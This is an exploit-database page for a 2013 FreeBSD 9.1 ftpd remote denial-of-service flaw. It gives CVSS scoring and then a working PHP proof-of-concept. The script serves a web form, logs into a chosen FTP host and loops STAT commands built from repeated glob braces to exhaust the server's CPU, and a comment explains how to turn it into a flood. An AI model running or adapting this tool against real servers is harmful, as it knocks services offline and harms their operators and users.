FreeBSD/GNU ftpd remote denial of service exploit

2013-01-31 / 2013-02-01
Credit: DevilTeam
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399

CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<?php //PoC by Kacper R. from //Bug found by: Maksymilian ( ) set_time_limit(0); if(isset($_GET['runit'])){ flush(); while(1){ $fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5); fread($fp,1024); fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024); fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024); fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n"); fclose($fp); time_nanosleep(0,300000000);//delete to flood flush(); } } if(!isset($_GET['host'])) $_GET['host']='localhost'; if(!isset($_GET['port'])) $_GET['port']='21'; if(!isset($_GET['user'])) $_GET['user']='anonymous'; if(!isset($_GET['pass'])) $_GET['pass']='anonymous'; echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of Service</title></head><body> <h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action="" method="GET"> <PRE> Host: <input type="text" name="host" value="'.$_GET['host'].'"> Port: <input type="text" name="port" value="'.$_GET['port'].'"> User: <input type="text" name="user" value="'.$_GET['user'].'"> Pass: <input type="text" name="pass" value="'.$_GET['pass'].'"> </PRE> </p>'; if(isset($_GET['confirm'])){ echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop" name="runit">'; echo '<p><br /><a href=""><img src=""></a><a href=""><img src="" width="100" hight="40"></a>'; } else{ echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">'; echo '<p><br /><a href=""><img src=""></a><a href="" ><img src="" width="100" hight="40"></a>'; } echo ' </form> </body> </html>'; ?>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top